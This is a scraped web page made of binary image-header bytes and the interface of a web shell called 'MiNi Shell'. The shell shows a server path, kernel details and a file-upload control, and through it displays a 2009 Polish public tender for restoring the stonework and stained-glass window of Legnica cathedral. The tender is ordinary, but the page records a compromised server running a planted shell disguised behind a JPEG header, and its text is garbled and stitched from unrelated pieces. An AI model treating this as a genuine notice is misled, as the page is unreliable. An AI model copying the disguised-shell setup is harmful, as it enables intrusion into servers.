JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090430/130148-N-2009.html

<p class="kh_header"><b>Legnica: Remont kamieniarki okiennej  i okna witrażowego zachodniej ściany kościoła katedralnego pw. Św. Piotra i Pawła w Legnicy</b><br>
<b>Numer ogłoszenia: 130148 - 2009; data zamieszczenia: 30.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Parafia Rzymskokatolicka p.w. Św. Ap. Piotra i Pawła , pl. Katedralny 6, 59-220 Legnica, woj. dolnośląskie, tel. 0-76 724 42 71, faks 0-76 724 42 77.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katedra.tabs.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: parafia rzymskokatolicka.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont kamieniarki okiennej  i okna witrażowego zachodniej ściany kościoła katedralnego pw. Św. Piotra i Pawła w Legnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont kamieniarki okiennej  i okna witrażowego zachodniej ściany kościoła katedralnego pw. Św. Piotra i Pawła w Legnicy w zakresie jak niżej :
- rusztowania zewnętrzne, rurowe o wysokości do 25m ( dwukrotne ustawienie i demontaż rusztowania)- 441,636 m2
- osłony z siatki na rusztowaniach zewnętrznych - 245,518 m2
- konstrukcje dachowe z tarcicy nasyconej, słupy o długości ponad 2 m, przekrój poprzeczny drewna do 180 cm2 - analogia - słupy konstrukcji wsporczej - 0,6758 m3
- konstrukcje dachowe z tarcicy nasyconej, kleszcze, przekrój poprzeczny drewna do 180cm2 analogia- 0,3456 m3
- hale typu ciężkiego, montaż stężeń ścian , analogia - stężenia - 0,0825t
- wykonanie renowacji zabytkowych witraży ornamentowych wraz z patynowaniem i wypalaniem na całej powierzchni - 40m2
- wykonanie nowego ( uproszczonego) witraża osłonowego ze szkła Antisol - 40m2
- wykonanie ramek stalowych do podwieszenia witraży podlegających renowacji - 40m2
- zabezpieczenie okna przed opadami atmosferycznymi w trakcie realizacji robót - 40m2
KAMIENIARKA
Oboknie Parapet
- długość parapetu	- 654,00 cm
- szerokość parapetu zew.	-15,00 cm
- szerokość parapetu wew.	- 30,00 cm

powierzchnia parapetu :
[(654,00 cm x 15,00 cm) + [(654,00 cm x 30,00 cm)] = 29 430,00 cm2 = 294,30 dm2 

Węgary - 2 szt.
- wysokość węgaru	- 453,00 cm
- szerokość węgaru w rozw.	- 30,00 cm

powierzchnia węgaru [2 szt. x (453,00 cm x 30,00 cm)] = 27 180,00 cm2 = 271,80 dm2

Łuk eliptyczny
- długość łuku	- 890,00 cm -szerokość łuku w rozw.	- 30,00 cm
powierzchnia łuku - (890,00 cm x 30,00 cm) = 26 700,00 cm2 = 267,00 dm2
razem: 294,30 dm2 + 271,80 dm2 + 267,00 dm2 = 833.10 dm2
Laskowania główne - 2 szt.
-długość laskowań głównych	- 226,00 cm + 227,00 cm + 227,00 cm = 680,00 cm
 - obwód laskowań głównych	- 92,00 cm

powierzchnia laskowań głównych - [2szt. x (680,00 cm x 92,00 cm)] = 125 120,00 cm2 = 1 251.20 dm2

Łuki ostre główne - 0.5 szt. + 0.5 szt. + 1 szt. = 2 szt.
-długość łuku	- 2 x 230,00 cm = 460,00 cm
-obwód łuku	- 60,00 cm 
powierzchnia rybich pęcherzy -[2 szt. x (460,00 cm x 60,00 cm)] = 55 200,00 cm2 = 552.00 dm2

Laskowania lancet - 2 szt. + 2 szt. + 2 szt. = 6 szt.
-długość laskowań 1 typu	- 226,00 cm + 227,00 cm + 237,00 cm = 690.00 cm
-długość laskowań II typu	- 226,00 cm + 227,00 cm + 217,00 cm = 670,00 cm
-długość laskowań III typu	- 226,00 cm + 227,00 cm + 202,00 cm = 655,00 cm obwód laskowań lancet	- 60,00 cm

powierzchnia laskowań głównych -
[2szt. x (690,00 cm x 60,00 cm)] + [2szt. x (670,00 cm x 60,00 cm)] + [2szt. x (655,00 cm x 60,00 cm)] = 
82 800,00 cm2 + 80 400,00 cm2 + 78 600,00 cm2 = 241 800,00 cm2= 2 418.00 dm2

Łuki lancet dolnych - 3 szt. + 3 szt. + 3 szt. = 9 szt.
- długość łuku wklęsło-wypukłego zewn. w rozw.- 2 x 70,00 cm = 140,00 cm
- obwód łuku wklęsło-wypuklego zewn.	- 60,00 cm
- długość łuku trólistnego wew. w rozw.
(2 x 25,00 cm) + (2 x 30,00 cm) + (2x 25,00 cm) = 160,00 cm
- obwód łuku trójlistnego wew.	- 50,00 cm
powierzchnia łuków lancet dolnych -
{9szt. x [(140,00 cm x 60,00 cm) + (160,00 cmx 50,00 cm)]} = 147 600,00 cm2 = 1 476.00 dm2

Trójliście - 2 szt. + 2 szt. + 2 szt. = 6 szt.
- długość łuku wew. w rozw.	- (2 x 25,00 cm) = 50,00 cm
- obwód łuku wew.	- 50,00 cm
powierzchnia trójliści - [6 szt. x (50,00 cm x 50,00 cm)] = 15 000,00 cm2 = 150,00 dm2
Łuki lancet górnych - 3 szt.
- długość łuku ostrego zewn. w rozw.        - 2 x 60,00 cm = 120,00 cm
- obwód łuku ostrego zewn.                        - 60,00 cm
- długość łuku trójlistnego wew. w rozw.    - (2 x 25,00 cm) + (2 x 30,00 cm) + (2 x 25,00 cm) = 160,00 cm
 -obwód łuku trójlistnego wew.	- 50,00 cm
powierzchnia łuków lancet dolnych -
{3 szt. x [(120,00 cm x 60,00 cm) + (160,00 cm x 50,00 cm)]} = 45 600,00 cm2 = 456,00 dm2
Rozety - 2 szt.
- długość łuku zewn. w rozw.- 70.00 cm + 50,00 cm + 30,00 cm = 150,00 cm
-   obwód łuku ostrego zewn.	- 60.00 cm
 - długość łuku wew. w rozw.	- (4 x 60,00 cm) = 240,00 cm           
- obwód łuku trójlistnego wew.                    - 50,00 cm
powierzchnia rybich pęcherzy -
{2 szt. x [(150,00 cm x 60,00 cm) + (240,00 cm x 50,00 cm)]} = 42 000,00 cm2 = 420,00 dm2

Rybie pęcherze górne - 2 szt.
- długość łuku zewn.	- 2 x 65,00 cm = 130,00 cm
- obwód łuku ostrego zewn.	- 60,00 cm
- długość łuku wew. w rozw.	- (2 x 25,00 cm) = 50,00 cm
- obwód łuku trójlistnego wew.	- 50,00 cm
powierzchnia rybich pęcherzy -
{2 szt. x [(130,00 cm x 60,00 cm) + (50,00 cm x 50,00 cm)]} = 20 600,00 cm2 =  206.00 dm2

Całkowita powierzchnia kamieniarki maswerku
833,10 dm2 + 1 251,20 dm2 + 552,00 dm2+ 2 418,00 dm2 + 1 476,00 dm2 + 150,00 dm2 + + 456,00 dm2 + 420,00 dm2 + 206,00 dm2 = 7 762,30 dm2

METALOWE PŁASKOWNIKI
Płaskowniki - 8 szt.
- długość płaskownika	- 654,00 cm
- obwód płaskownika	- (2 x 2,50 cm) + (2x 6,00 cm) = 17,00 cm
powierzchnia płaskowników - [8 szt. x (654,00 cm x 17,00 cm)] = 88 944,00 cm2 = 889.44 dm2 

Klubki-8x 18- 144 szt.
- długość klubki	- 5,00 cm
- obwód klubki	- (2x 1,00 cm) + (2x 5,00 cm) = 12,00 cm
powierzchnia klubek -  [144 szt. x (5,00 cm x 12.00 cm)] = 8 640,00 cm2 = 86.40 dm2

Wzmocnienia - 2 szt.
- długość wzmocnienia	- 654,00 cm
- obwód wzmocnienia	- (2 x 3,80 cm) + (2 x 4,00 cm) = 15,60 cm
powierzchnia wzmocnień - [2 szt. x (654,00 cm x 15,60 cm)] = 20 404,80 cm2 = 204.05 dm2

Klamry - 18 szt.
- długość klamry w rozw.	- (2 x 30,00 cm) + (2 x 4,00 cm) = 68,00 cm
- szerokość klamry w rozw.	- (2 x 2,50 cm) + (2x 0,80 cm) = 6.60 cm
     
powierzchnia klamer - [ 18 szt. x (68,00 cm x 6,60 cm)] = 8 078,40 cm2 = 80.78 dm2

Całkowita powierzchnia metalowych wzmocnień
889,44 dm2 + 86,40 dm2 + 204,05 dm2+ 80,78 dm2 = 1 260,67 dm2

GLIF CEGLANY
Parapet
- długość parapetu	- 762,90 cm
- szerokość parapetu	- 55,00 cm
powierzchnia parapetu - (762,90 cm x 55,00 cm)] = 41 959,50 cm2 = 419.60 dm2
Węgary - 2 szt.
- wysokość węgaru	- 453,00 cm
- szerokość węgaru	- 44,00 cm
powierzchnia węgarów - [2 szt. x (453,00 cm x 44,00 cm)] - 39 864,00 cm2 = 398.64 dm2
	

Łuk
- długość łuku	- 990,00 cm
- szerokość łuku	- 44,00 cm
powierzchnia łuku - (990,00 cm x 44,00 cm)] = 43 560,00 cm2 = 435.60 dm2

Całkowita powierzchnia glifu 
419,60dm2 + 398,64 dm2 + 435,60 dm2 = 1 244,84 dm2


Szczegółowy zakres prac określa Rozdział 4 siwz ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.67-7, 45.45.30.00-7, 45.26.25.10-9, 39.29.90.00-4, 92.31.10.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniają następujące warunki:

1.  Nie podlegają wykluczeniu na podstawie art. 24 oraz spełniają  warunki  określone w  art. 22 ust. 1 pkt. 1)-3) ustawy Pzp. 
Ocena spełnienia warunku wg załącznika nr 1 Instrukcji dla Wykonawców - Rozdział 2 specyfikacji istotnych warunków zamówienia.
- Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ww. warunek muszą spełnić każdy z osobna.
           
 2.  Prowadzą działalność w zakresie robót będących przedmiotem zamówienia.
Ocena warunku wg  dokumentu - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
- Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ww. warunek mogą spełnić łącznie.

3. Mają do dyspozycji odpowiednio wykwalifikowany personel w celu obsadzenia podanych niżej  stanowisk:
Kierownik budowy z uprawnieniami budowlanymi dla branży konstrukcyjno - budowlanej bez ograniczeń, wpisany na listę członków PIIB i ubezpieczony od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku  z wykonywaniem ww. funkcji. Ponadto winien posiadać zaświadczenie od konserwatora zabytków o posiadaniu kwalifikacji do prowadzenia prac przy zabytkach lub oświadczenie, że  posiada min. 2-letnie doświadczenie  przy prowadzeniu prac przy zabytkach oraz  jeżeli w załączniku nr 2 wykonawca wskazał osoby, którymi będzie dysponował pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jak i też pisemne zobowiązanie wskazanychosób.                                                                      
Ocena spełnienia warunku odbywać się będzie wg załącznika nr 2 niniejszej instrukcji. Osoba wskazana w załączniku nr 2 powinny posiadać uprawnienia budowlane w odpowiedniej specjalności. 
Do załącznika dołączyć: 
- kserokopie uprawnień budowlanych, 
- potwierdzenie wpisu na listę członków PIIB 
- zaświadczenie od konserwatora zabytków o posiadaniu kwalifikacji do prowadzenia prac przy zabytkach lub oświadczenie, że  posiada min. 2-letnie doświadczenie przy prowadzeniu prac przy zabytkach potwierdzone dokumentem np.: referencje, opinie lub kserokopie dziennika budowy.


4. Posiadają niezbędną wiedzę i doświadczenie w realizacji podobnych zamówień tzn. jako Wykonawca  wykonali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 4 zamówienia odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane należycie. 
Przez rodzaj zamówienia odpowiadającego rodzajem i wartością Zamawiający rozumie:
- prace konserwatorskie  na obiekcie zabytkowym  wpisanym do rejestru zabytków,
- zamówienie stanowiące co najmniej 75% wartości oferowanej przez Wykonawcę.
Dla firmy wykonującej renowację witraży : doświadczenie w realizacji podobnych zamówień tzn. jako Wykonawca  wykonanie w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej :
- renowacji minimum 400m2 witraży w kamiennych ramach w obiektach zabytkowych oraz wykonanie minimum 100 m2 nowego witraża.
Ocena spełnienia warunku odbywać się będzie wg  załącznika nr 3 niniejszej instrukcji. W załączniku podać wartość robót, datę wykonania i odbiorców wraz z dokumentami od poprzednich Zamawiających potwierdzającymi, że roboty te zostały wykonane  należycie. 
- Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ww. warunek mogą spełnić łącznie.


5. Posiadają polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
Ocena  spełnienia warunku wg ww. dokumentów.
- Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ww. warunek mogą spełnić łącznie.

6. Wykonają siłami własnymi nie mniej niż 60% zakresu rzeczowego robót.
Ocena warunku odbywać się będzie  wg załącznika nr 4 Instrukcji dla Wykonawców Rozdział 2 specyfikacji istotnych warunków zamówienia.
- Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ww. warunek mogą spełnić łącznie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> ad.1
Ocena spełnienia warunku wg załącznika nr 1 Instrukcji dla Wykonawców Rozdział 2 specyfikacji istotnych warunków zamówienia
- Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ww. warunek muszą spełnić każdy z osobna.
	
ad.2
Ocena warunku wg  dokumentu  - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
- Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ww. warunek mogą spełnić łącznie.

ad. 3
Ocena spełnienia warunku odbywać się będzie wg  załącznika nr 2 Instrukcji dla Wykonawców  Rozdział 2 specyfikacji istotnych warunków zamówienia
Osoba wskazana w załączniku nr 2 powinna posiadać uprawnienia budowlane w odpowiedniej specjalności być wpisana na listę członków PIIB i ubezpieczona od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku  z wykonywaniem ww. funkcji. Ponadto winna posiadać zaświadczenie od konserwatora zabytków o posiadaniu kwalifikacji do prowadzenia prac przy zabytkach lub oświadczenie, że  posiada min. 2-letnie doświadczenie  przy prowadzeniu prac przy zabytkach. Do załącznika dołączyć: kserokopie uprawnień budowlanych, potwierdzenie wpisu na listę członków PIIB oraz załączyć  informacje na temat kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych czynności oraz  jeżeli w załączniku nr 2 wykonawca wskazał osoby, którymi będzie dysponował pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jak i też pisemne zobowiązanie wskazanych osób.                                                                      
- Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ww. warunek mogą spełnić łącznie.

ad. 4
Ocena spełnienia warunku odbywać się będzie wg  załącznika nr 3 Instrukcji dla Wykonawców  Rozdział 2 specyfikacji istotnych warunków zamówienia
W załączniku podać wartość robót, datę wykonania i odbiorców wraz z dokumentami od poprzednich Zamawiających potwierdzającymi, że roboty te zostały wykonane  należycie. 
- Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ww. warunek mogą spełnić łącznie.
      
ad. 5
Ocena  spełnienia warunku wg dokumentu - polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
- Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ww. warunek mogą spełnić łącznie.


ad. 6
Ocena warunku odbywać się będzie  wg  załącznika nr 4 Instrukcji dla Wykonawców Rozdział 2 specyfikacji istotnych warunków zamówienia
- Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ww. warunek mogą spełnić łącznie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.katedra.tabs.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Parafia Rzymskokatolicka pw. Św. Piotra i Pawła w Legnicy, Plac Katedralny 6, Legnica.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2009 godzina 12:00, miejsce: Parafia Rzymskokatolicka pw. Św. Piotra i Pawła w Legnicy, Plac Katedralny 6, Legnica.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com